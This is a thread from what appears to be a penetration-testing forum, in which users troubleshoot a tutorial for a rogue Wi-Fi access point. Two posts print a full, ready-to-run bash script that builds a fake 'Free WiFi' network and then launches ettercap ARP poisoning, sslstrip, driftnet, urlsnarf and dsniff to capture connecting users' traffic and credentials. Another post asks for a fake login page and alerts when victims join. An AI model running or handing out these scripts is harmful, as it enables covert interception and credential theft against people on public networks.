
Thread: Lucafa's tutorial: softAP with internet connection and MITM sniffing

  1. #21
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I can ping the host (or call it the softAP), and I have internet on the host machine, aka eth1, but still can't ping or surf... I have answered the questions you asked below:

    ap/dc; what wireless card are you using? awus36h

    A: Make sure you've got what's NEEDED (look at the beginning of my tutorial) checked

    B: Try playing around with your wireless card's MTU values
    (ifconfig wlan0 MTU 1400, 1500 or 1800, and ifconfig mon0 MTU 1400, 1500, or 1800, mess around with some combinations)
    What are MTU values?

    C: Maybe the MITM tools are causing you trouble. Try again without them, do all the steps from 1 to 7, and leave this command out: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I have not tried the MITM tools yet

    D: If it still doesn't work and you happen to have got a second pc/laptop, repeat all tutorial's steps on this different machine to see if it helps. I've also got some problems with fake ap's on my laptop, it only works on my older pc.
    I have not tried that yet

    cheers,

  2. #22
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Question help with fake ap and proxy settings

    I'm trying to set up a fake AP with Lucifer's tutorial in the how-tos, and I need to know if I can get the client who connects to get their internet from my proxy connection. I currently use adb and my Android phone for the connection on my copy of BackTrack 4. I use Proxoid to tether my connection and use the adb command forward tcp:8080, but to use apt-get I have to use this command, "export http_proxy=http://localhost:8080", in the konsole. If this sounds confusing, believe me, it was hard work to get it all done lol. So if anyone has any easier suggestions that I can do to make it easier and get it to work with a fake AP, and also my package manager still thinks I don't have a connection when I clearly do lol

  3. #23
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    - In order for it to work, you will need to try out the stuff I suggested.
    - What are MTU values? let me google that for you
    - Start off by trying the whole tutorial on a different pc/laptop.
    - If the same problem persists, then try my C suggestion, and when your fake AP is up (without the MITM tools), begin by changing at0 MTU to 1400 (ifconfig at0 MTU 1400) and see if it works. If it does not, play around with wlan0 and mon0 MTU. Keep on trying until it works.
    - Report back when you've tried everything I suggested.

    Good luck man,

  4. #24
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I have tried experimenting with the MTU and tried two different computers. I am seeing that getting an IP takes a long time, and when it's OK I still got NO internet :\
    I have tried l3g10n's tips, but it fails on the "/var/run/dhcp3-server/dhcpd.pid" no such file/directory ... etc

    See underneath

    Cheers!

    Quote Originally Posted by l3g10n View Post
    #!/bin/bash
    # Wifi WMITM Attack - n3n4umxc - Pastebin.com

    #----------------------------------------------------------------------#
    # This script is what I have taken from a script I found on the old BT
    # forums by Deathray. I modified it to fit my needs. -l3g10n
    #----------------------------------------------------------------------#
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    airmon-ng
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcp3-server/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap sslstrip driftnet urlsnarf
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    ifconfig $WIFACE up

    modprobe tun

    echo Airbase-ng is going to create our fake AP with the SSID we specified
    xterm -e airbase-ng -e "$ESSID" -P -C 30 -v mon0 &

    sleep 10

    echo Configuring interface created by airbase-ng
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

    echo 'Setting up iptables to handle traffic seen by the airbase-ng (at0) interface'
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE

    echo Creating a dhcpd.conf to assign addresses to clients that connect to us
    echo "default-lease-time 600;" > dhcpd.conf
    echo "max-lease-time 720;" >> dhcpd.conf
    echo "ddns-update-style none;" >> dhcpd.conf
    echo "authoritative;" >> dhcpd.conf
    echo "log-facility local7;" >> dhcpd.conf
    echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
    echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
    echo "option routers 10.0.0.1;" >> dhcpd.conf
    echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
    echo "}" >> dhcpd.conf

    echo 'DHCP server starting on our airbase-ng interface (at0)'
    dhcpd3 -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

    xterm -e tail -f /var/log/messages &
    #echo 'Launching ettercap, poisoning all hosts on the at0 interface's subnet'
    xterm -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
    sleep 8

    echo 'Configuring ip forwarding'
    echo "1" > /proc/sys/net/ipv4/ip_forward

    echo 'Launching various tools'
    xterm -e sslstrip -a -k -f &
    driftnet -v -i at0 &
    xterm -e urlsnarf -i at0 &
    xterm -e dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &

  5. #25
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote Originally Posted by ap/dc View Post
    I have tried experimenting with the MTU and tried two different computers. I am seeing that getting an IP takes a long time, and when it's OK I still got NO internet :\
    I have tried l3g10n's tips, but it fails on the "/var/run/dhcp3-server/dhcpd.pid" no such file/directory ... etc

    See underneath

    Cheers!
    I always get that error... it doesn't have an effect on the overall script. It's basically saying that it can't write the process id to a txt file. What is the output from the airbase-ng window?

  6. #26
    Just burned his ISO
    Join Date
    Feb 2010
    Location
    uk
    Posts
    23

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hi,
    Great tut, works just great.
    I have tried to get it to display an HTML page as a login page and to warn that it's insecure.
    I have got the apache2 server running with address 127.0.1.1.
    Entering 127.0.1.1 in the browser on the attack machine, I get the HTML page.
    Tried adjusting iptables to redirect but NO success. Any help please.
    Also, how can I be alerted with a tone when a client attaches? I guess there is a string I can monitor for attached clients.
    Thanks

  7. #27
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote Originally Posted by seanile View Post
    Hi,
    Great tut, works just great.
    I have tried to get it to display an HTML page as a login page and to warn that it's insecure.
    I have got the apache2 server running with address 127.0.1.1.
    Entering 127.0.1.1 in the browser on the attack machine, I get the HTML page.
    Tried adjusting iptables to redirect but NO success. Any help please.
    Also, how can I be alerted with a tone when a client attaches? I guess there is a string I can monitor for attached clients.
    Thanks
    You may want to check out karmetasploit if you want users to be directed to your webpage. There is a script that is included in BT to autolaunch it: /pentest/wireless/kmsapng/kmsapng.sh . As far as monitoring, you could watch /var/log/messages for DHCP assignments or airbase-ng for client associations to your fakeap.

  8. #28
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I made some more tweaks to the script. Let me know if you have any issues.

    WifiMITM-NEW.sh

    Code:
    #!/bin/bash
    killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail 
    
    echo 'Network Interfaces:'
    ifconfig | grep Link
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    airmon-ng
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    ifconfig $WIFACE up
    
    modprobe tun
    
    #airbase-ng is going to create our fake AP with the SSID we specified
    xterm -bg black -fg yellow -e airbase-ng -e "$ESSID" -P -C 30 -v mon0  &
    
    sleep 10
    
    echo Configuring interface created by airbase-ng
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    
    echo 'Setting up iptables to handle traffic seen by the airbase-ng (at0) interface'
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    
    echo Creating a dhcpd.conf to assign addresses to clients that connect to us
    echo "default-lease-time 600;" > dhcpd.conf
    echo "max-lease-time 720;"  >> dhcpd.conf
    echo "ddns-update-style none;" >> dhcpd.conf
    echo "authoritative;"  >> dhcpd.conf
    echo "log-facility local7;"  >> dhcpd.conf
    echo "subnet 10.0.0.0 netmask 255.255.255.0 {"  >> dhcpd.conf
    echo "range 10.0.0.100 10.0.0.254;"  >> dhcpd.conf
    echo "option routers 10.0.0.1;"  >> dhcpd.conf
    echo "option domain-name-servers 8.8.8.8;"  >> dhcpd.conf
    echo "}"  >> dhcpd.conf
    
    echo 'DHCP server starting on our airbase-ng interface (at0)'
    dhcpd3 -f -cf dhcpd.conf at0 &
    echo "Launching DMESG"
    xterm -bg black -fg red -e tail -f /var/log/messages &
    echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
    xterm -bg black -fg blue -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
    sleep 8
    
    echo 'Configuring ip forwarding'
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo 'Launching various tools'
    sslstrip -a -k -f &
    driftnet -v -i at0 &
    xterm  -bg black -fg green -e urlsnarf  -i at0 &
    dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &

  9. #29
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    14

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Thx l3g10n. It's working rly nice..
    Just 1 prob is this:
    Can't create PID file /var/run/dhcpd.pid: Permission denied.
    The change here, I suppose, breaks it somehow?
    dhcpd3 -f -cf dhcpd.conf at0 &
    And I like the colors, but the blue of ettercap is making it difficult to read.

  10. #30
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Thnx for the script, legion! I'm very close now! >) I can connect, I get an IP & I can also ping web sites. But I can't surf. Are there any settings in the script I need to configure?
